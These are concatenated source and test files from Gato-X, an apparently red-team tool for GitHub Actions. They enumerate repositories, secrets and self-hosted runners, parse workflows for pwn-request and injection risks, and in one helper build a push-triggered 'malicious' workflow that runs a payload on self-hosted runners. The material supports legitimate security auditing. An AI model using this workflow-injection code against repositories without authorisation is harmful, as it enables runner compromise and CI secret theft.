                    f"Skipping archived repository: {Output.bright(repo.name)}!"
                )
                return False

            Output.tabbed(f"Enumerating: {Output.bright(repo.name)}!")

            self.repo_e.enumerate_repository(repo, large_org_enum=large_enum)
            self.repo_e.enumerate_repository_secrets(repo)
            Recommender.print_repo_secrets(
                self.user_perms["scopes"], repo.secrets + repo.org_secrets
            )
            Recommender.print_repo_runner_info(repo)
            Recommender.print_repo_attack_recommendations(
                self.user_perms["scopes"], repo
            )

            return repo
        else:
            Output.warn(
                f"Unable to enumerate {Output.bright(repo_name)}! It may not "
                "exist or the user does not have access."
            )

    def enumerate_repos(self, repo_names: list):
        """Enumerate a list of repositories, each repo must be in Org/Repo name
        format.

        Args:
            repo_names (list): Repository name in {Org/Owner}/Repo format.
        """
        repo_wrappers = []
        if not self.__setup_user_info():
            return repo_wrappers

        if len(repo_names) == 0:
            Output.error("The list of repositories was empty!")
            return repo_wrappers

        Output.info(
            f"Querying and caching workflow YAML files "
            f"from {len(repo_names)} repositories!"
        )
        queries = GqlQueries.get_workflow_ymls_from_list(repo_names)
        self.__query_graphql_workflows(queries)

        try:
            for repo in repo_names:
                repo_obj = self.enumerate_repo_only(repo, len(repo_names) > 100)
                if repo_obj:
                    repo_wrappers.append(repo_obj)
        except KeyboardInterrupt:
            Output.warn("Keyboard interrupt detected, exiting enumeration!")

        return repo_wrappers



import yaml


class CICDAttack:
    """Class to encapsulate helper methods for attack features. Functionality
    here will focus on data processing and payload creation/management as
    opposed to API / Git interaction.
    """

    @staticmethod
    def create_push_yml(payload: str, branch_name: str):
        """Create a malicious yaml file that will trigger on push to a
        specific branch.

        Args:
            payload (str): Command to be executed as part of the 'run' payload.
            branch_name (str): Name of the branch for on: push trigger.

        Returns:
            str: Workflow yaml file containing the payload.
        """
        yaml_file = {}

        yaml_file["name"] = branch_name
        yaml_file["on"] = {"push": {"branches": branch_name}}

        test_job = {
            "runs-on": ["self-hosted"],
            "steps": [{"name": "Run Tests", "run": payload}],
        }
        yaml_file["jobs"] = {"testing": test_job}

        return yaml.dump(yaml_file, sort_keys=False)



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.models.workflow import Workflow
from gatox.models.repository import Repository


class CacheManager:
    """
    Singleton class that manages an in-memory cache for workflows and reusable actions.

    TODO: Integrate with Redis.
    """

    _instance = None

    def __new__(cls):
        """
        Create a new instance of the class. If an instance already exists, return that instance.
        """
        if cls._instance is None:
            cls._instance = super(CacheManager, cls).__new__(cls)
            cls._instance.repo_wf_lookup = {}
            cls._instance.repo_store = {}
            cls._instance.workflow_cache = {}
            cls._instance.action_cache = {}
        return cls._instance

    def get_workflow(self, repo_slug: str, workflow_name: str):
        """
        Get a workflow from the in-memory dictionary.
        """
        key = f"{repo_slug.lower()}:{workflow_name}"
        return self.workflow_cache.get(key, None)

    def is_repo_cached(self, repo_slug: str):
        """
        Check if a repository is in the in-memory dictionary.
        """
        return repo_slug.lower() in self.repo_wf_lookup

    def is_action_cached(self, repo_slug: str, action_path: str, ref: str):
        """
        Check if action is cached.
        """
        key = f"{repo_slug.lower()}:{action_path}:{ref}"
        return key in self.action_cache

    def get_workflows(self, repo_slug: str):
        """
        Get all workflows for a repository from the in-memory dictionary.
        """
        wf_keys = self.repo_wf_lookup.get(repo_slug.lower(), None)
        if wf_keys:
            return [
                self.workflow_cache[f"{repo_slug.lower()}:{key}"] for key in wf_keys
            ]
        else:
            return set()

    def get_action(self, repo_slug: str, action_path: str, ref: str):
        """
        Get an action from the in-memory dictionary.
        """
        key = f"{repo_slug.lower()}:{action_path}:{ref}"
        return self.action_cache.get(key, None)

    def set_repository(self, repository: Repository):
        """
        Set a repository in the in-memory dictionary.
        """
        key = repository.name.lower()
        self.repo_store[key] = repository

    def get_repository(self, repo_slug: str):
        """
        Get a repository from the in-memory dictionary.
        """
        return self.repo_store.get(repo_slug.lower(), None)

    def set_workflow(self, repo_slug: str, workflow_name: str, value: Workflow):
        """
        Set a workflow in the in-memory dictionary.
        """
        key = f"{repo_slug.lower()}:{workflow_name}"
        if repo_slug.lower() not in self.repo_wf_lookup:
            self.repo_wf_lookup[repo_slug.lower()] = set()
        self.repo_wf_lookup[repo_slug.lower()].add(workflow_name)
        self.workflow_cache[key] = value

    def set_empty(self, repo_slug: str):
        """
        Set an empty value in the in-memory dictionary for a repository.
        """
        self.repo_wf_lookup[repo_slug.lower()] = set()

    def set_action(self, repo_slug: str, action_path: str, ref: str, value: str):
        """
        Set an action in the in-memory dictionary.
        """
        key = f"{repo_slug.lower()}:{action_path}:{ref}"
        self.action_cache[key] = value



from unittest.mock import patch, MagicMock
from gatox.github.search import Search
from gatox.search.search import Searcher
from gatox.cli.output import Output


Output(True)


@patch("gatox.github.search.time.sleep")
@patch("gatox.github.search.Api")
def test_search_api(mock_api, mock_time):

    mock_api.call_get.return_value.status_code = 200

    mock_api.call_get.return_value.json.side_effect = [
        {
            "items": [
                {
                    "path": ".github/workflows/yaml_wf.yml",
                    "repository": {"fork": False, "full_name": "testOrg/testRepo"},
                }
            ]
        },
        {"items": []},
    ]
    mock_api.call_get.return_value.links = {}

    searcher = Search(mock_api)

    res = searcher.search_enumeration("testOrganization")
    assert len(res) == 1
    assert "testOrg/testRepo" in res


@patch("gatox.github.search.time.sleep")
@patch("gatox.github.search.Api")
def test_search_api_cap(mock_api, mock_time, capfd):

    mock1 = MagicMock()
    mock1.status_code = 200

    mock1.json.return_value = {
        "items": [
            {
                "path": ".github/workflows/yaml_wf.yml",
                "repository": {"fork": False, "full_name": "testOrg/testRepo"},
            }
        ]
    }
    mock1.links = {"next": {"url": "test"}}

    mock2 = MagicMock()
    mock2.status_code = 422

    mock_api.call_get.side_effect = [mock1, mock2]

    searcher = Search(mock_api)

    res = searcher.search_enumeration("testOrganization")
    assert len(res) == 1
    out, err = capfd.readouterr()
    assert "[-] Search failed with response code 422" in out


@patch("gatox.github.search.time.sleep")
@patch("gatox.github.search.Api")
def test_search_api_ratelimit(mock_api, mock_time, capfd):

    mock1 = MagicMock()
    mock1.status_code = 200

    mock1.json.return_value = {
        "items": [
            {
                "path": ".github/workflows/yaml_wf.yml",
                "repository": {"fork": False, "full_name": "testOrg/testRepo"},
            }
        ]
    }
    mock1.links = {"next": {"url": "test"}}

    mock2 = MagicMock()
    mock2.status_code = 403

    mock3 = MagicMock()
    mock3.status_code = 200
    mock3.json.return_value = {"items": []}
    mock3.links = {}

    mock_api.call_get.side_effect = [mock1, mock2, mock3]

    searcher = Search(mock_api)

    res = searcher.search_enumeration("testOrganization")
    assert mock_time.call_count == 2
    assert len(res) == 1

    out, err = capfd.readouterr()
    assert "[!] Secondary API Rate Limit Hit." in out


@patch("gatox.github.search.Api")
def test_search_api_permission(mock_api, capfd):

    mock1 = MagicMock()
    mock1.status_code = 422

    mock1.json.return_value = {
        "message": "Validation Failed",
        "errors": [
            {
                "message": "The listed users and repositories cannot be "
                "searched either because the resources do not exist or you "
                "do not have permission to view them.",
                "resource": "Search",
                "field": "q",
                "code": "invalid",
            }
        ],
        "documentation_url": "https://docs.github.com/v3/search/",
    }

    mock_api.call_get.side_effect = [mock1]

    searcher = Search(mock_api)

    res = searcher.search_enumeration("privateOrg")
    assert len(res) == 0
    out, err = capfd.readouterr()
    assert "[-] Search failed with response code 422!" in out
    assert " listed users and repositories cannot be searched " in out


@patch("gatox.github.search.time.sleep")
@patch("gatox.github.search.Api")
def test_search_api_iniitalrl(mock_api, mock_time, capfd):

    mock1 = MagicMock()
    mock1.status_code = 403

    mock1.json.return_value = {
        "documentation_url": "https://docs.github.com/en/free-pro-team@latest"
        "/rest/overview/resources-in-the-rest-api#secondary-rate-limits",
        "message": "You have exceeded a secondary rate limit"
        ". Please wait a few minutes before you try again.",
    }

    mock2 = MagicMock()
    mock2.status_code = 200
    mock2.json.return_value = {
        "items": [
            {
                "path": ".github/workflows/yaml_wf.yml",
                "repository": {"fork": False, "full_name": "testOrg/testRepo"},
            }
        ]
    }
    mock2.links = {}

    mock_api.call_get.side_effect = [mock1, mock2]

    searcher = Search(mock_api)

    res = searcher.search_enumeration("testOrg")
    assert len(res) == 1
    out, err = capfd.readouterr()
    assert "[!] Secondary API Rate Limit Hit." in out


@patch("gatox.github.search.Search.search_enumeration")
@patch("gatox.search.search.Api")
def test_search(mock_api, mock_search):
    mock_search.return_value = ["candidate1", "candidate2"]
    gh_search_runner = Searcher("ghp_AAAA")

    res = gh_search_runner.use_search_api("targetOrg")
    mock_search.assert_called_once()
    assert res is not False


@patch("gatox.github.search.Search.search_enumeration")
@patch("gatox.search.search.Api")
def test_search_query(mock_api, mock_search, capfd):
    mock_search.return_value = ["candidate1", "candidate2"]
    gh_search_runner = Searcher("ghp_AAAA")

    res = gh_search_runner.use_search_api(None, query="pull_request_target self-hosted")
    mock_search.assert_called_once()
    out, err = capfd.readouterr()
    assert "GitHub with the following query: pull_request_target self-hosted" in out


@patch("gatox.search.search.Api.check_user")
def test_search_bad_token(mock_api):
    mock_api.return_value = False
    gh_search_runner = Searcher("ghp_AAAA")

    res = gh_search_runner.use_search_api("targetOrg")
    assert res is False



import unittest
from unittest.mock import MagicMock
from gatox.enumerate.reports.actions import ActionsReport
from gatox.enumerate.reports.runners import RunnersReport

PWN_DETAILS = {
    "workflow_name": "pwn1.yml",
    "workflow_url": "https://github.com/testOrg/testRepo/blob/main/.github/workflows/pwn1.yml",
    "details": {
        "candidates": {
            "build": {
                "confidence": "MEDIUM",
                "gated": False,
                "steps": [
                    {
                        "ref": "${{ github.event_name == 'pull_request_target' && format('refs/pull/{0}/merge', github.event.number) || '' }}",
                        "if_check": None,
                        "step_name": "Checkout",
                    }
                ],
                "if_check": "",
            }
        },
        "triggers": ["pull_request_target"],
    },
    "environments": [],
}

PWN_DETAILS_TOCTOU = {
    "workflow_name": "pwn2.yml",
    "workflow_url": "https://github.com/testOrg/testRepo/blob/main/.github/workflows/pwn2.yml",
    "details": {
        "candidates": {
            "build": {
                "confidence": "MEDIUM",
                "gated": False,
                "steps": [
                    {
                        "ref": "github.event.pull_request.head.ref",
                        "if_check": None,
                        "step_name": "Checkout",
                    }
                ],
                "if_check": "",
            }
        },
        "triggers": ["pull_request_target:labeled"],
    },
    "environments": [],
}


PWN_DETAILS_TOCTOU2 = {
    "workflow_name": "pwn3.yml",
    "workflow_url": "https://github.com/testOrg/testRepo/blob/main/.github/workflows/pwn3.yml",
    "details": {
        "candidates": {
            "build": {
                "confidence": "MEDIUM",
                "gated": False,
                "steps": [
                    {
                        "ref": "format('refs/pull/{0}/merge', github.event.number)",
                        "if_check": None,
                        "step_name": "Checkout",
                    }
                ],
                "if_check": "",
            }
        },
        "triggers": ["pull_request_target"],
    },
    "environments": ["ci"],
}

PWN_DETAILS_TOCTOU3 = {
    "workflow_name": "pwn4.yml",
    "workflow_url": "https://github.com/testOrg/testRepo/blob/main/.github/workflows/pwn4.yml",
    "details": {
        "candidates": {
            "build": {
                "confidence": "MEDIUM",
                "gated": True,
                "steps": [
                    {
                        "ref": "format('refs/pull/{0}/merge', github.event.number)",
                        "if_check": None,
                        "step_name": "Checkout",
                    }
                ],
                "if_check": "",
            }
        },
        "triggers": ["issue_comment"],
    },
    "environments": [],
}

INJ_DETAILS = {
    "workflow_name": "inj1.yml",
    "workflow_url": "https://github.com/testOrg/testRepo/blob/main/.github/workflows/inj1.yml",
    "details": {
        "build": {
            "if_check": None,
            "Set comment body": {"variables": ["steps.extract.outputs.filename"]},
        },
        "triggers": ["pull_request_target"],
    },
    "environments": [],
}


def test_report_pwn(capfd):
    """Test reporting a pwn request vulnerability."""
    repository = MagicMock()
    repository.pwn_req_risk = [PWN_DETAILS]

    ActionsReport.report_pwn(repository)

    out, err = capfd.readouterr()

    assert "The workflow runs on a risky trigger and might check out the PR" in out
    assert "Checkout Ref: ${{ github.event_name == 'pull_request_target' && format('refs/pull/{0}/merge', github.event.number) || '' }}"


def test_report_pwn_toctou_label(capfd):
    """Test reporting a pwn request vulnerability with TOCTOU."""

    repository = MagicMock()
    repository.pwn_req_risk = [PWN_DETAILS_TOCTOU]
    repository.name = "testOrg/testRepo"

    ActionsReport.report_pwn(repository)
    out, err = capfd.readouterr()

    assert " The workflow contains label-based gating but the workflow uses a" in out
    assert "Checkout Ref: github.event.pull_request.head.ref" in out
    assert "Trigger(s): pull_request_target:labeled" in out


def test_report_pwn_toctou_env(capfd):
    """Test reporting a pwn request vulnerability with TOCTOU, where
    the gate check if a deployment environment.
    """

    repository = MagicMock()
    repository.pwn_req_risk = [PWN_DETAILS_TOCTOU2]
    repository.name = "testOrg/testRepo"

    ActionsReport.report_pwn(repository)
    out, err = capfd.readouterr()

    assert "Issue Type: Pwn Request with Approval TOCTOU" in out
    assert "Checkout Ref: format('refs/pull/{0}/merge', github.event.number)" in out


def test_report_pwn_toctou_comment(capfd):
    """Test reporting a pwn request vulnerability with TOCTOU, where
    the gate check if a deployment environment.
    """

    repository = MagicMock()
    repository.pwn_req_risk = [PWN_DETAILS_TOCTOU3]
    repository.name = "testOrg/testRepo"

    ActionsReport.report_pwn(repository)
    out, err = capfd.readouterr()

    assert "Issue Type: Pwn Request With Permission TOCTOU" in out
    assert "Checkout Ref: format('refs/pull/{0}/merge', github.event.number)" in out
    assert "The workflow contains a permission check, but uses a mutable" in out


def test_report_inj(capfd):
    """Test reporting an injection vulnerability."""
    repository = MagicMock()
    repository.name = "testOrg/testRepo"
    repository.injection_risk = [INJ_DETAILS]
    ActionsReport.report_injection(repository)

    out, err = capfd.readouterr()

    assert " The workflow uses variables by context expression within run or" in out



import pytest

from gatox import main


def test_cli_double_proxy(capfd):
    """Test case where no arguments are provided."""
    with pytest.raises(SystemExit):
        main.entry()

    out, err = capfd.readouterr()
    assert "are required: command" in err



import json
import textwrap
import re

from gatox.cli.colors import (
    RED_DASH,
    GREEN_PLUS,
    GREEN_EXCLAIM,
    RED_EXCLAIM,
    BRIGHT_DASH,
    YELLOW_EXCLAIM,
    YELLOW_DASH,
)

from colorama import Style, Fore


class Singleton(type):
    _instances = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
        return cls._instances[cls]


SPLASH = """

 .d8888b.         d8888 88888888888  .d88888b.         Y88b   d88P 
d88P  Y88b       d88888     888     d88P" "Y88b         Y88b d88P  
888    888      d88P888     888     888     888          Y88o88P   
888            d88P 888     888     888     888           Y888P    
888  88888    d88P  888     888     888     888           d888b    
888    888   d88P   888     888     888     888 888888   d88888b   
Y88b  d88P  d8888888888     888     Y88b. .d88P         d88P Y88b  
 "Y8888P88 d88P     888     888      "Y88888P"         d88P   Y88b 
                                                                   
    By @adnanthekhan - github.com/AdnaneKhan/gato-x                                            
                                                                
"""


class Output(metaclass=Singleton):

    def __init__(self, color: bool):
        self.color = color

        self.red_dash = RED_DASH if color else "[-]"
        self.red_explain = RED_EXCLAIM if color else "[!]"
        self.green_plus = GREEN_PLUS if color else "[+]"
        self.green_exclaim = GREEN_EXCLAIM if color else "[!]"
        self.bright_dash = BRIGHT_DASH if color else "-"
        self.yellow_exclaim = YELLOW_EXCLAIM if color else "[!]"
        self.yellow_dash = YELLOW_DASH if color else "[-]"

    @classmethod
    def write_json(cls, execution_wrapper, output_json):
        """Writes JSON to path specified earlier.

        Args:
            execution_wrapper (Execution): Wrapper object for Gato
            enumeration run.
            output_json (str): Path to Json file
        Returns:
            True if successful, false otherwise.
        """
        if execution_wrapper.user_details:
            with open(output_json, "w") as json_out:
                json_out.write(json.dumps(execution_wrapper.toJSON(), indent=4))
            return True

    @classmethod
    def error(cls, message: str):
        """Prints error text.

        Args:
            message (str): Message to format.
        """
        print(f"{Output().red_dash} {message}")

    @classmethod
    def info(cls, message: str, end="\n", flush=False):
        """Prints info text, this adds a green [+] to the message.

        Args:
            message (str): The message to print.
        """
        print(f"{Output().green_plus} {message}", end=end, flush=flush)

    @classmethod
    def tabbed(cls, message: str):
        """Prints a tabbed message with a bright '-'

        Args:
            message (str): The message to print.
        """
        print(f"    {Output().bright_dash} {message}")

    @classmethod
    def header(cls, message: str):
        """Prints a message surrounded by '---'

        Args:
            message (str): The message to print.
        """
        print(f"{cls.bright('---')}" f" {message} " f"{cls.bright('---')}")

    @classmethod
    def result(cls, message: str):
        """Prints a result, this is something good that the tool found.

        Args:
            message (str): The message to print.
        """
        print(f"{Output().green_plus} {message}")

    @classmethod
    def generic(cls, message: str):
        """Generic output to print block wrapped text."""

        def get_length_without_color_codes(text):
            # Use regular expressions to remove ANSI color codes
            ansi_escape = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
            text_without_color = ansi_escape.sub("", text)

            # Calculate the length of the string without color codes
            length_without_color = len(text_without_color)

            return length_without_color

        lines = textwrap.wrap(message, width=78)
        for line in lines:
            padding = 78 - get_length_without_color_codes(line)

            if line[0] not in [" ", "-", "=", "-", "~"]:
                print(f"| {line}{' '*(padding-1)}|")
            else:
                print(f"|{line}{' '*padding}|")

    @classmethod
    def owned(cls, message: str):
        """Prints a result, this is means that the tool has found a likely
        vector to own something.

        Args:
            message (str): The message to print.
        """
        print(f"{Output().green_exclaim} {message}")

    @classmethod
    def inform(cls, message: str):
        """Used to inform a user.

        Args:
            message (str): The message to print.
        """

        print(f"{Output().yellow_dash} {message}")

    @classmethod
    def warn(cls, message: str):
        """Used to let the user know something that they should not, but
        unlikely to lead to an exploit.
        """
        print(f"{Output().yellow_exclaim} {message}")

    @classmethod
    def bright(cls, toformat: str):
        """Highlights the text and returns it.

        Args:
            toformat (str): Message to format.

        Returns:
            (str): Highlighted text.
        """

        if cls not in cls._instances or Output().color:
            return f"{Style.BRIGHT}{toformat}{Style.RESET_ALL}"
        else:
            return toformat

    @classmethod
    def yellow(cls, toformat: str):
        """Makes the text yellow and returns it.

        Args:
            toformat (str): Message to format.

        Returns:
            (str)): Formatted message.
        """
        if cls not in cls._instances or Output().color:
            return f"{Fore.YELLOW}{toformat}{Style.RESET_ALL}"
        else:
            return toformat

    @classmethod
    def blue(cls, toformat: str):
        """Makes the text blue and returns it.

        Args:
            toformat (str): Message to format.

        Returns:
            (str)): Formatted message.
        """
        if cls not in cls._instances or Output().color:
            return f"{Fore.CYAN}{toformat}{Style.RESET_ALL}"
        else:
            return toformat

    @classmethod
    def green(cls, toformat: str):
        """Makes the text green and returns it.

        Args:
            toformat (str): Message to format.

        Returns:
            (str)): Formatted message.
        """
        if cls not in cls._instances or Output().color:
            return f"{Fore.GREEN}{toformat}{Style.RESET_ALL}"
        else:
            return toformat

    @classmethod
    def red(cls, toformat: str):
        """Makes the text red and returns it.

        Args:
            toformat (str): Message to format.

        Returns:
            (str)): Formatted message.
        """
        if cls not in cls._instances or Output().color:
            return f"{Fore.RED}{toformat}{Style.RESET_ALL}"
        else:
            return toformat



import datetime

from gatox.models.organization import Organization
from gatox.models.organization import Repository


class Execution:
    """Simple wrapper class to provide accessor methods against a full Gato
    execution run.
    """

    def __init__(self):
        """Initialize wrapper class."""
        self.user_details = None
        self.organizations: list[Organization] = []
        self.repositories: list[Repository] = []
        self.timestamp = datetime.datetime.now()

    def add_organizations(self, organizations: list[Organization]):
        """Add list of organization wrapper objects.

        Args:
            organizations (List[Organization]): List of org wrappers.
        """
        if organizations:
            self.organizations = organizations

    def add_repositories(self, repositories: list[Repository]):
        """Add list of organization wrapper objects.

        Args:
            organizations (List[Organization]): List of org wrappers.
        """
        if repositories:
            self.repositories = repositories

    def set_user_details(self, user_details):
        """_summary_

        Args:
            user_details (dict): Details about the user's permissions.
        """
        self.user_details = user_details

    def toJSON(self):
        """Converts the run to Gato JSON representation"""

        if self.user_details:
            representation = {
                "username": self.user_details["user"],
                "scopes": self.user_details["scopes"],
                "enumeration": {
                    "timestamp": self.timestamp.ctime(),
                    "organizations": [
                        organization.toJSON() for organization in self.organizations
                    ],
                    "repositories": [
                        repository.toJSON() for repository in self.repositories
                    ],
                },
            }

            return representation



import os
import pathlib
import pytest
import json

from unittest.mock import MagicMock

from gatox.models.organization import Organization
from gatox.enumerate.organization import OrganizationEnum

TEST_ORG_DATA = None
TEST_REPO_DATA = None


@pytest.fixture(scope="session", autouse=True)
def load_test_files(request):
    global TEST_REPO_DATA
    global TEST_ORG_DATA
    global TEST_WORKFLOW_YML
    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/example_repo.json")
    test_org_path = os.path.join(curr_path, "files/example_org.json")
    test_wf_path = os.path.join(curr_path, "files/main.yaml")

    with open(test_repo_path, "r") as repo_data:
        TEST_REPO_DATA = json.load(repo_data)

    with open(test_org_path, "r") as repo_data:
        TEST_ORG_DATA = json.load(repo_data)

    with open(test_wf_path, "r") as wf_data:
        TEST_WORKFLOW_YML = wf_data.read()


def test_assemble_repo_list():
    """Test getting a list of repos to scan from org."""

    mock_api = MagicMock()

    test_private_repodata = TEST_REPO_DATA.copy()
    test_private_repodata["visibility"] = "private"
    test_private_repodata["private"] = True

    mock_api.check_org_repos.side_effect = [
        [test_private_repodata],
        [],
        [TEST_REPO_DATA],
    ]

    mock_api.validate_sso.return_value = True

    gh_enumeration_runner = OrganizationEnum(mock_api)

    organization = Organization(TEST_ORG_DATA, user_scopes=["repo", "workflow"])

    repos = gh_enumeration_runner.construct_repo_enum_list(organization)

    assert len(repos) == 2
    assert repos[0].is_public() is False
    assert repos[1].is_public() is True


def test_admin_enum():
    """Test checks that Gato performs if the user is an org admin and has an
    appropriately scoped token."""

    mock_api = MagicMock()

    organization = Organization(
        TEST_ORG_DATA, user_scopes=["repo", "workflow", "admin:org"]
    )

    mock_api.check_org_runners.return_value = {
        "total_count": 1,
        "runners": [
            {
                "id": 21,
                "name": "ghrunner-test",
                "os": "Linux",
                "status": "online",
                "busy": False,
                "labels": [
                    {"id": 1, "name": "self-hosted", "type": "read-only"},
                    {"id": 2, "name": "Linux", "type": "read-only"},
                    {"id": 3, "name": "X64", "type": "read-only"},
                ],
            }
        ],
    }

    mock_api.get_org_secrets.return_value = [
        {
            "name": "DEPLOY_TOKEN",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
            "visibility": "all",
        },
        {
            "name": "GH_TOKEN",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
            "visibility": "selected",
            "selected_repositories_url": "https://api.github.com/orgs/testOrg/actions/secrets/GH_TOKEN/repositories",
        },
    ]
    gh_enumeration_runner = OrganizationEnum(mock_api)

    gh_enumeration_runner.admin_enum(organization)

    assert len(organization.secrets) == 2
    assert len(organization.runners) == 1



"""
Copyright 2024, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging

from pathlib import Path
import os
import re

from gatox.configuration.configuration_manager import ConfigurationManager
from gatox.workflow_parser.utility import filter_tokens, decompose_action_ref
from gatox.workflow_parser.components.job import Job
from gatox.models.workflow import Workflow

logger = logging.getLogger(__name__)


class WorkflowParser:
    """Parser for YML files.

    This class is structurd to take a yaml file as input, it will then
    expose methods that aim to answer questions about the yaml file.

    This will allow for growing what kind of analytics this tool can perform
    as the project grows in capability.

    This class should only perform static analysis. The caller is responsible for
    performing any API queries to augment the analysis.
    """

    def __init__(self, workflow_wrapper: Workflow, non_default=None):
        """Initialize class with workflow file.

        Args:
            workflow_yml (str): String containing yaml file read in from
            repository.
            repo_name (str): Name of the repository.
            workflow_name (str): name of the workflow file
        """
        if workflow_wrapper.isInvalid():
            raise ValueError("Received invalid workflow!")

        self.parsed_yml = workflow_wrapper.parsed_yml

        if "jobs" in self.parsed_yml and self.parsed_yml["jobs"] is not None:
            self.jobs = [
                Job(job_data, job_name)
                for job_name, job_data in self.parsed_yml.get("jobs", []).items()
            ]
        else:
            self.jobs = []
        self.raw_yaml = workflow_wrapper.workflow_contents
        self.repo_name = workflow_wrapper.repo_name
        self.wf_name = workflow_wrapper.workflow_name
        self.callees = []
        self.sh_callees = []
        self.external_ref = False

        if workflow_wrapper.special_path:
            self.external_ref = True
            self.external_path = workflow_wrapper.special_path
            self.branch = workflow_wrapper.branch
        elif non_default:
            self.branch = non_default
        else:
            self.branch = None

        self.composites = self.extract_referenced_actions()

    def is_referenced(self):
        return self.external_ref

    def has_trigger(self, trigger):
        """Check if the workflow has a specific trigger.

        Args:
            trigger (str): The trigger to check for.
        Returns:
            bool: Whether the workflow has the specified trigger.
        """
        return self.get_vulnerable_triggers(trigger)

    def output(self, dirpath: str):
        """Write this yaml file out to the provided directory.

        Args:
            dirpath (str): Directory to save the yaml file to.

        Returns:
            bool: Whether the file was successfully written.
        """
        Path(os.path.join(dirpath, f"{self.repo_name}")).mkdir(
            parents=True, exist_ok=True
        )

        with open(
            os.path.join(dirpath, f"{self.repo_name}/{self.wf_name}"), "w"
        ) as wf_out:
            wf_out.write(self.raw_yaml)
            return True

    def extract_referenced_actions(self):
        """
        Extracts composite actions from the workflow file.
        """
        referenced_actions = {}
        vulnerable_triggers = self.get_vulnerable_triggers()
        if not vulnerable_triggers:
            return referenced_actions

        if "jobs" not in self.parsed_yml:
            return referenced_actions

        for job in self.jobs:
            for step in job.steps:
                # Local action referenced
                if step.type == "ACTION":
                    action_parts = decompose_action_ref(
                        step.uses, step.step_data, self.repo_name
                    )
                    # Save off by uses as key
                    if action_parts:
                        referenced_actions[step.uses] = action_parts

        return referenced_actions

    def get_vulnerable_triggers(self, alternate=False):
        """Analyze if the workflow is set to execute on potentially risky triggers.

        Returns:
            list: List of triggers within the workflow that could be vulnerable
            to GitHub Actions script injection vulnerabilities.
        """
        vulnerable_triggers = []
        risky_triggers = [
            "pull_request_target",
            "workflow_run",
            "issue_comment",
            "issues",
            "discussion_comment",
            "discussion" "fork",
            "watch",
        ]
        if alternate:
            risky_triggers = [alternate]

        if not self.parsed_yml or "on" not in self.parsed_yml:
            return vulnerable_triggers
        triggers = self.parsed_yml["on"]
        if isinstance(triggers, list):
            for trigger in triggers:
                if trigger in risky_triggers:
                    vulnerable_triggers.append(trigger)
        elif isinstance(triggers, str):
            if triggers in risky_triggers:
                vulnerable_triggers.append(triggers)
        elif isinstance(triggers, dict):
            for trigger, trigger_conditions in triggers.items():
                if trigger in risky_triggers:
                    if trigger_conditions and "types" in trigger_conditions:
                        if (
                            "labeled" in trigger_conditions["types"]
                            and len(trigger_conditions["types"]) == 1
                        ):
                            vulnerable_triggers.append(
                                f"{trigger}:{trigger_conditions['types'][0]}"
                            )
                        else:
                            vulnerable_triggers.append(trigger)
                    else:
                        vulnerable_triggers.append(trigger)

        return vulnerable_triggers

    def backtrack_gate(self, needs_name):
        """Attempts to find if a job needed by a specific job has a gate check."""
        if type(needs_name) is list:
            for need in needs_name:
                if self.backtrack_gate(need):
                    return True
            return False
        else:
            for job in self.jobs:
                if job.job_name == needs_name and job.gated():
                    return True
                # If the job it needs does't have a gate, then check if it does.
                elif job.job_name == needs_name and not job.gated():
                    return self.backtrack_gate(job.needs)
        return False

    def analyze_checkouts(self):
        """Analyze if any steps within the workflow utilize the
        'actions/checkout' action with a 'ref' parameter.

        Returns:
            job_checkouts: List of 'ref' values within the 'actions/checkout' steps.
        """
        job_checkouts = {}
        if "jobs" not in self.parsed_yml:
            return job_checkouts

        for job in self.jobs:
            job_content = {
                "check_steps": [],
                "if_check": job.evaluateIf(),
                "confidence": "UNKNOWN",
                "gated": False,
            }
            step_details = []
            bump_confidence = False

            if job.isCaller():
                self.callees.append(job.uses.split("/")[-1])
            elif job.external_caller:
                self.callees.append(job.uses)

            if job_content["if_check"] and job_content["if_check"].startswith(
                "RESTRICTED"
            ):
                job_content["gated"] = True

            for step in job.steps:
                # If the step is a gate, exit now, we can't reach the rest of the job.
                if step.is_gate:
                    job_content["gated"] = True
                elif step.is_checkout:
                    # Check if the dependant jobs are gated.
                    if job.needs:
                        job_content["gated"] = self.backtrack_gate(job.needs)
                    # If the step is a checkout and the ref is pr sha, then no TOCTOU is possible.
                    if job_content["gated"] and (
                        "github.event.pull_request.head.sha" in step.metadata.lower()
                        or (
                            "sha" in step.metadata.lower()
                            and "env." in step.metadata.lower()
                        )
                    ):
                        # Break out of this job.
                        break
                    else:
                        if_check = step.evaluateIf()
                        if if_check and if_check.startswith("EVALUATED"):
                            bump_confidence = True
                        elif if_check and "RESTRICTED" in if_check:
                            # In the future, we will exit here.
                            bump_confidence = False
                        elif if_check == "":
                            pass

                        step_details.append(
                            {
                                "ref": step.metadata,
                                "if_check": if_check,
                                "step_name": step.name,
                            }
                        )

                elif step_details and step.is_sink:
                    # Confirmed sink, so set to HIGH if reachable via expression parser or no check at all
                    job_content["confidence"] = (
                        "HIGH"
                        if (
                            job_content["if_check"]
                            and job_content["if_check"].startswith("EVALUATED")
                        )
                        or (bump_confidence and not job_content["if_check"])
                        or (
                            not job_content["if_check"]
                            and (
                                not step.evaluateIf()
                                or step.evaluateIf().startswith("EVALUATED")
                            )
                        )
                        else "MEDIUM"
                    )

            job_content["check_steps"] = step_details
            job_checkouts[job.job_name] = job_content

        return job_checkouts

    def check_pwn_request(self, bypass=False):
